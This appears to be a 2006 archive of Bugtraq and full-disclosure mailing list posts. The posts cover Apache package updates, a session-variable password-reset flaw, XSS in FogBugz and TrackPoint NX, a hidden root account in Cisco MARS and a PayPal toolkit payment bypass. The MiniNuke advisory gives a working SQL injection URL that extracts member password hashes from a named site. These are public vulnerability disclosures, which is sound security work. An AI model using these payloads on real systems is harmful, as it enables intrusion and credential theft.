http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4_i386.deb
Size/MD5: 91312 47b5f83da69812066513000b0b41d2ac
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4_i386.deb
Size/MD5: 35008 f609ef4c84ec1f2cc1b208ccd090b852
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-8ubuntu1_i386.deb
Size/MD5: 383510 6ea2eab8114d8b98ad92495e0bd6482e
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.3-8ubuntu1_i386.deb
Size/MD5: 488900 c14399ebc205896ed564c25b5caf5140
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4_i386.deb
Size/MD5: 259618 6a4827f36c6ffc570d51acf07b6fce91
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4_i386.deb
Size/MD5: 131098 9d7230a6c28716ed0312fd4aa329ff77
powerpc architecture (Apple Macintosh G3/G4/G5)
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-common_1.3.33-8ubuntu1_powerpc.deb
Size/MD5: 916804 73b3193a58736eb9bcb0a5c80ecd8a93
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-dbg_1.3.33-8ubuntu1_powerpc.deb
Size/MD5: 8717248 94937cc19dbec615f5cd6044a2fa507a
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-perl_1.3.33-8ubuntu1_powerpc.deb
Size/MD5: 522470 bd55c7b338c4c4f73ebd8f04986ce2c1
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache-ssl_1.3.33-8ubuntu1_powerpc.deb
Size/MD5: 514840 a58275590f4268ffdf0a4c886bf6bbad
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 854038 c27922832b31bef8649cd7159625dd89
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 218214 d020ea657485fb2bd2a290443bb6b8f5
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 213860 375246f469c00900018061186aaa1e0c
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 217386 2c5b73c348aa1ae513dc40584d3e2789
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 169302 9060652d8386e05fb36bdf77ffebfe05
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 170042 2eca7805b3285db87db07ba8daa09c17
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 103298 2abd2af3fe90b06bcd3de996f9aeaa03
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 35012 57821d6ed956a238b5b13393411e4918
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/apache_1.3.33-8ubuntu1_powerpc.deb
Size/MD5: 402864 e287ea1bc261db4b0bce941dd1c22b5e
http://security.ubuntu.com/ubuntu/pool/universe/a/apache/libapache-mod-perl_1.29.0.3-8ubuntu1_powerpc.deb
Size/MD5: 491414 d232929639d3a9636e574e8573c33179
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 278878 6c3647225a81c8842dfd8927e650c10b
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.54-5ubuntu4_powerpc.deb
Size/MD5: 140150 33185bae3bf5a0a6c481316f2c599ae8
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFDxiHVvjztR8bOoMkRAg8MAKChvXGqQJEvpIemLbBEuEgQP+MLdQCgt6OZ
o/Dx4HiQL3h4wh3koibkr2c=xB5i
-----END PGP SIGNATURE-----
From - Thu Jan 12 15:43:07 2006
X-UIDL: 43c6bf5a00000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22837-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0DF7B32CA4
for <lists@securityspace.com>; Thu, 12 Jan 2006 15:40:34 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 12:17:31 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id A4A7D23A823; Thu, 12 Jan 2006 11:59:18 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 32035 invoked from network); 12 Jan 2006 04:00:51 -0000
Message-ID: <43C63E74.1050906@scanit.be>
Date: Thu, 12 Jan 2006 11:33:08 +0000
From: Alla Bezroutchko <alla@scanit.be>
User-Agent: Mozilla Thunderbird 1.0.7 (X11/20051210)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Session data pollution vulnerabilities in web applications
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Status:
In web applications I've tested recently I have stumbled upon something
that seems to be new class of bugs. Quick googling did not turn up any
reference to this kind of vulnerabilities, so I thought I should
describe it.
The problem boils down to the application reusing the same session
variable name in different application functions. In one function the
session variable is initialized from the user supplied data, and in
another function the value of the same session variable is used to
perform some sensitive action.
Here is an example. Suppose you have a web application that
requires authentication with login and password. New users can register
by filling in a form (let's say displayed by register1.php).
register2.php takes the form data, saves it in the session, checks it,
and if something is wrong with it, redirects back to register1.php with
error message saying what needs to be corrected. Say the login name the
user has chosen is saved to the session like this:
$_SESSION['login'] = $_POST['login'];
Now, let's say another part of the application deals with forgotten
passwords. On page resetpw1.php the user enters his user name.
resetpw2.php looks up the secret question for that user in the database
and displays it. User enters the answer to the secret question.
resetpw3.php checks if the answer is correct, saves the user name in the
session ($_SESSION['login'] = $_POST['login'];) and asks the user to
enter the new password. The user enters the new password, and
resetpw4.php takes the user name from the session ($login $_SESSION['login']), takes the password from the form data, and updates
the password for that username in the database.
An attacker can first submit data to register2.php (setting the
$_SESSION['login'] to the value of his choice) and then submit data to
resetpw4.php that will take $_SESSION["login"] and change the password
for that account. resetpw4.php trusts the value in $_SESSION['login']
because it thinks that $_SESSION['login'] was created by resetpw3.php,
which verified it by means of secret question.
The problem stems from the fact that same session variable is used by
different processes in the application to store both trusted and
untrusted data.
I have seen this kind of bugs (not only related to logins and passwords,
but other things as well) in several different applications, written by
different development teams in Java and PHP. I suppose it is rather
common problem. These bugs are easy to identify when the source code is
available - just grep for lines where the session variables are
initialized, check where the data comes from, and if it comes from the
user, check where else that session variable is used. They are a lot
more difficult to find with a black-box testing of a web application,
though one can and does stumble upon them accidentally.
As for fixing those bugs, I suppose one approach is having a separate
session variable for each function in the application. For example new
user registration will keep its stuff in $_SESSION["register"]["login"]
and authentication will keep its stuff in $_SESSION["auth"]["login"]
Regards,
Alla Bezroutchko
Scanit
From - Thu Jan 12 16:13:07 2006
X-UIDL: 43c6c66200000001
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22845-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E311032CA4
for <lists@securityspace.com>; Thu, 12 Jan 2006 16:04:30 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 13:04:28 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id CBC9D23AE01; Thu, 12 Jan 2006 12:00:44 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 12850 invoked from network); 12 Jan 2006 10:17:56 -0000
Subject: Re: [Full-disclosure] Session data pollution vulnerabilities in
web applications
From: Frank Knobbe <frank@knobbe.us>
To: Alla Bezroutchko <alla@scanit.be>
Cc: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
In-Reply-To: <43C63E74.1050906@scanit.be>
References: <43C63E74.1050906@scanit.be>
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-Hz0wCVqJkMRby0A7KGGo"
Date: Thu, 12 Jan 2006 10:50:47 -0600
Message-Id: <1137084647.25372.13.camel@localhost>
Mime-Version: 1.0
X-Mailer: Evolution 2.4.2.1 FreeBSD GNOME Team Port
Status:
--=-Hz0wCVqJkMRby0A7KGGo
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable
On Thu, 2006-01-12 at 11:33 +0000, Alla Bezroutchko wrote:
> As for fixing those bugs, I suppose one approach is having a separate
> session variable for each function in the application. For example new
> user registration will keep its stuff in $_SESSION["register"]["login"]
> and authentication will keep its stuff in $_SESSION["auth"]["login"]
These type of bugs stem from bad program design. (BTW: I wouldn't call
it session data pollution... your not polluting anything).
The proposed fix is -- besides being only specific to this example --
equally flawed. The underlying issue is that you trust user supplied
data. When a user supplies a user name for login purposes, you should
only use that input to perform a search in your database. If a match has
been found, take a *trusted* value from your database, for example an
index ID, and carry that in the session object to identify the user.
In other words, don't accept any user input (even after proper input
validation) and carry it as trusted data in your session object. Don't
base further decisions on this data. Since it is user supplied it can
not be trusted.
Your example is further flawed in that it allows the change of a
password without being properly authenticated. Just having a valid
'login' session object present doesn't indicate that the user is
authenticated. I really, really hope this was just an example you made
up, and not something you actually saw being used. If so, go back to
that web site with a clue-by-four and give it a few whacks.
But you are right that these type of issues are common. While we're
educating developers on secure program design, I think we need to do a
better job at teaching some paranoia too. Every programmer should have a
healthy dose of paranoia and distrust when writing applications :)
Cheers,
Frank
--
It is said that the Internet is a public utility. As such, it is best
compared to a sewer. A big, fat pipe with a bunch of crap sloshing
against your ports.
--=-Hz0wCVqJkMRby0A7KGGo
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)
iD8DBQBDxojnGr6G9pK6fXURAv/3AJ9B9Atuwese2L31dig2hkFIK8P3WgCfb5+y
geWDjaftTpr5t9mq5WMbhVs=/XOs
-----END PGP SIGNATURE-----
--=-Hz0wCVqJkMRby0A7KGGo--
From - Thu Jan 12 16:43:28 2006
X-UIDL: 43c6cd7f00000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22844-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id EBCC532CA4
for <lists@securityspace.com>; Thu, 12 Jan 2006 16:40:13 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 13:17:11 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 6418223AD41; Thu, 12 Jan 2006 12:00:27 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 20731 invoked from network); 12 Jan 2006 12:54:02 -0000
Message-ID: <20060112222217.go1wjs6t2aw0okso@webmail.nukedx.com>
Date: Thu, 12 Jan 2006 22:22:17 -0600
From: nukedx@nukedx.com
To: submit@milw0rm.com, full-disclosure@lists.grok.org.uk,
bugtraq@securityfocus.com, orhankara@soulshosting.com
Subject: Advisory: MiniNuke CMS System <= 1.8.2 (news.asp) SQL Injection
vulnerability
References: <20060102234526.o22qne4zi474wocw@webmail.nukedx.com>
<20060109213942.ayea5f4rstoo00ww@webmail.nukedx.com>
In-Reply-To: <20060109213942.ayea5f4rstoo00ww@webmail.nukedx.com>
MIME-Version: 1.0
Content-Type: text/plain;
charset=ISO-8859-9;
format="flowed"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
User-Agent: Internet Messaging Program (IMP) H3 (4.0.3)
Status:
--Security Report--
Advisory: XSS attack on Superonline.com email service.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:47 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web:
http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can inject SQL query to the news.asp
---
How&Example: GET ->
http://[site]/news.asp?Action=Print&hid=[SQLQuery]
http://www.miniex.net/news.asp?Action=Print&hidf%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_idR
Columns of MEMBERS:
uye_id = userid
sifre = md5 password hash
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
icq = ICQ Uin
msn = MSN Sn.
aim = AIM Sn.
meslek = job
cinsiyet = gender
yas = age
url = url
imza = signature
mail_goster = show mail :P
avurl = avatar url
avatar = avatar
--
Thanks to ajan;)
Regards,
From the NWPX team,
nuker a.k.a nukedx
From - Thu Jan 12 17:23:07 2006
X-UIDL: 43c6d6ca00000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22840-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id E07F032CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 17:19:03 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 13:56:00 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 14EDA23ABA9; Thu, 12 Jan 2006 11:59:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 994 invoked from network); 12 Jan 2006 04:42:12 -0000
Message-ID: <20060112110447.2917.qmail@mail.securityfocus.com>
From: "M.Neset KABAKLI" <neset@wakiza.com>
To: <bugtraq@securityfocus.com>
Subject: FogBugz Cross Site Scripting Vulnerability
Date: Thu, 12 Jan 2006 13:15:03 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Thread-Index: AcYXaW8i4iV+Z3+5R2CSoaHumAWrZQ=X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Status:
I.Vulnerability
FogBugz Cross Site Scripting Vulnerability
II.Vendor
Fog Creek Software (www.fogcreek.com)
III.Affected Systems
- FogBugz (<= 4.029)
IV.About
FogBugz is a complete web based project management system for software
teams. Designed by Joel Spolsky of Joel on Software fame (www.fogcreek.com).
V.Description
An attacker is able to inject HTML and client-side script codes to FogBugz
login page by modifying dest variabe. An example crafted link can be found
below.
VI.Exploit
http://[fogbugz.example.com]/default.asp?pg=pgLogon&dest=[XSS]
VII.Vulnerability Status
- Vulnerability discovered on 2005-12-11.
- Vendor notified on 2005-12-13.
- Patch released on 2005-12-13.
VIII.Credits
M.Neset KABAKLI, Wakiza Software Technologies (www.wakiza.com).
From - Thu Jan 12 17:53:07 2006
X-UIDL: 43c6ddd200000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22842-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8A2E532CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 17:47:15 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 14:47:13 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4E4C32399B7; Thu, 12 Jan 2006 12:00:07 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 6894 invoked from network); 12 Jan 2006 06:41:51 -0000
Date: Thu, 12 Jan 2006 07:14:42 -0600 (CST)
From: Gadi Evron <ge@linuxbox.org>
To: bugtraq@securityfocus.com
Subject: Cisco, haven't we learned anything? (technician reset)
Message-ID: <Pine.LNX.4.21.0601120710450.21762-100000@linuxbox.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Greylist: Sender is SPF-compliant, not delayed by milter-greylist-1.7.5 (linuxbox.org [127.0.0.1]); Thu, 12 Jan 2006 07:14:43 -0600 (CST)
Status:
In this
(
http://www.cisco.com/warp/public/707/cisco-sa-20060111-mars.shtml) recent
Cisco advisory, the company alerts us to a security problem
with Cisco MARS (Cisco Security Monitoring Analysis and Response System).
The security issue is basically a user account on the system that will
give you root when accessed.
The account is:
1. Hidden.
2. Default.
3. With a pre-set password.
In other words, this is a journey back 10 years when technicians would
commonly have special keys (actual keys, electronics or passwords) to
access a device if they have to troubleshoot it for anything, or say? the
user lost his password.
People used to trade these keys online and hidden accounts were a thing of
common practice. Today people still trade commonly used default passwords
but it is not as popular as it used to be, at least in the online world.
On the other hand, the most common practice to hack routers today, is
still to try and access the devices with the notoriously famous default
login/password for Cisco devices: cisco/cisco.
Cisco/cisco is the single most used default password of our time. It got
more routers pwned than any exploit in history, and it still does. One
would think that a company such as Cisco, especially with this history,
would stay away from such ?default? accounts? but the fact that this
account is hidden makes it something different.
It makes it a backdoor. One much like those used by the Bad Guys.
Now? if Cisco knowingly put it there, shame on them. If somebody put it
there without their knowledge? well, shame on them.
This is indeed a vulnerability, as in a weakness. It is not however a
software coding bug that may result in say? a buffer overflow. It is a
part of the design of the system.
Cisco disclosing this is very nice and commendable, but perhaps they
should also let us know whether this was indeed a backdoor somebody put in
their system or if it was part of the design?
I love eastereggs. I just don?t like surprises in system privileges or
backdoors, especially not in a security monitoring and response product.
I very much doubt it was anything else but a part of the design but that
should be admitted to.
As the advisory states:
"No other Cisco products are currently known to be affected by this
vulnerability."
Okay, but how about other vulnerabilities of this type? Are there any more
backdoors to other Cisco products?
If not, why wouldn?t they just come out and say that?
?There are NO other such backdoors in our products?.
I?d even be happy with:
?To our knowledge, there are no other vulnerabilities of this type in our
products.?
This is not a bug. One can never be sure ALL bugs are eliminated ? however
hard one may try.
One CAN admit to having no such features in other products, though.
Once again we fall upon re-naming of a feature as a bug or a bug as a
feature to make the problem sound less severe.
IN this case, the judgement is plain and simple:
If Cisco were Bad Guys, this is a backdoor.
As Cisco are Good Guys, this is a technician reset.
Terminology? What?s the difference?
The difference is that Cisco are not Bad Guys. If they disclosure a
problem they should do it fully, because as a client, I am now concerned.
This reminds me of Ciscogate but not for obvious reasons. That was a bad
event for everybody involved.
It reminds me of the very issue Mike Lynn discussed:
Remote exploitation for Cisco is possible, while so far Cisco disclosed
all these problems as DoS vulnerabilities.
I am not saying Cisco did that on purpose, but in THIS case they CAN set
my mind at ease.
Why don?t they?
Gadi.
From - Thu Jan 12 18:13:07 2006
X-UIDL: 43c6e28200000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22839-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 0250332CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 18:02:32 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:02:29 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4F3CF23AB34; Thu, 12 Jan 2006 11:59:29 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 969 invoked from network); 12 Jan 2006 04:40:10 -0000
Message-ID: <20060112110318.16195.qmail@mail2.securityfocus.com>
From: "M.Neset KABAKLI" <neset@wakiza.com>
To: <bugtraq@securityfocus.com>
Subject: Interspire TrackPoint NX XSS Vulnerability
Date: Thu, 12 Jan 2006 13:13:01 +0200
MIME-Version: 1.0
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: 7bit
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
Thread-Index: AcYXaSZlvHH8OubwRfqUynofVcCdSA=X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Status:
I.Vulnerability
Interspire TrackPoint NX Cross Site Scripting Vulnerability
II.Vendor
Interspire (www.interspire.com)
III.Affected Systems
- Interspire TrackPoint NX (< 0.1)
IV.About
TrackPoint is a web based sales tracking software.
V.Description
An attacker is able to inject HTML and client-side script codes to
TrackPoint NX login page by modifying username variable. An example provided
below.
VI.Exploit
http://[www.example.com]/[tpointdir]/index.php?Page=login&Action=Login&usern
ame=[XSS]
VII.Vulnerability Status
- Vulnerability discovered on 2005-11-13.
- Vendor notified on 2005-12-09.
- Patch released on 2005-12-12
(
http://www.interspire.com/forum/showthread.php?p)606).
VIII.Credits
M.Neset KABAKLI, Wakiza Software Technologies (www.wakiza.com).
From - Thu Jan 12 18:13:07 2006
X-UIDL: 43c6e28200000002
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22843-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id CE32832CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 18:09:02 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:09:00 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id C253023AC90; Thu, 12 Jan 2006 12:00:17 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 9669 invoked from network); 12 Jan 2006 08:09:17 -0000
Message-ID: <006001c61786$5b22c660$0100000a@agapov25>
Reply-To: "uinC Team" <vuln@uinc.ru>
From: "uinC Team" <vuln@uinc.ru>
To: <bugtraq@securityfocus.com>
Subject: Multiple PHP Toolkit for PayPal Vulnerabilities
Date: Thu, 12 Jan 2006 17:42:04 +0300
Organization: Underground InformatioN Center
MIME-Version: 1.0
Content-Type: text/plain;
charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1506
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1506
Status:
Vendor: Patrick Breitenbach and Dave Nielsen [
http://paypal.sf.net/]
Versions affected: PHP Toolkit for PayPal v0.50 (and may be prior)
Date: 12th January 2006
Type of Vulnerability: Sensitive Information Disclosure and Payment System
Bypass
Severity: Critical
Solution Status: Unpatched
Vendor was notified on 9th January 2006 without answer
Discovered by: .cens, uinC Team
Online location:
http://www.uinc.ru/articles/vuln/ptpaypal050.shtml
Background:
>From vendor web-site:
"The PHP Toolkit provides a set of scripts that faciliatate the integration
of PayPal into an ecommerce service. It provides scripts that generate a
PayPal form dynamically as well as scripts to process Instant Payment
Notifications."
Description:
1) Payment System Bypass
If the payment through PayPal.com was completed successfully, payment data
is transferred to ipn.php, which in turn executes ipn_success.php, passing
it the parsed payment data as parameters using POST request. ipn_success.php
will enter the passed data straight into log file without verifying where
this data came from. This means, an attacker can reproduce the POST request
and enter the details of the successful payment into the log file even if
there was no payment through PayPal.com
2) Sensitive Information Disclosure
PHP Toolkit for PayPal vendor documentation recommends to set permissions
for the "logs" directory "../ipn/logs/" to 777. Data from ipn_success.php
suggests that the payment data log file is "logs/ipn_success.txt", which, if
installed according to documentation, will have global read permission. As a
result, anyone is able to view the transaction data.
From - Thu Jan 12 18:23:07 2006
X-UIDL: 43c6e4da00000001
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-22841-lists=securityspace.com@securityfocus.com>
Delivered-To: pop0012@securityspace.com
Received: from outgoing.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 670CE32CF7
for <lists@securityspace.com>; Thu, 12 Jan 2006 18:16:34 -0500 (EST)
Received: from outgoing.securityfocus.com by outgoing.securityfocus.com
via smtpd (for mx.securityspace.com [69.28.227.216]) with ESMTP; Thu, 12 Jan 2006 15:16:32 -0800
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 4469623AC71; Thu, 12 Jan 2006 11:59:41 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 4548 invoked from network); 12 Jan 2006 05:04:33 -0000
Resent-Cc: recipient list not shown: ;
Old-Return-Path: <joey@infodrom.org>
X-Original-To: debian-security-announce@lists.debian.org
Message-Id: <m1Ex0go-000ol9C@finlandia.Infodrom.North.DE>
Date: Thu, 12 Jan 2006 12:32:22 +0100 (CET)
From: joey@infodrom.org (Martin Schulze)
Content-Type: text/plain; charset=iso-8859-1
Content-Disposition: inline
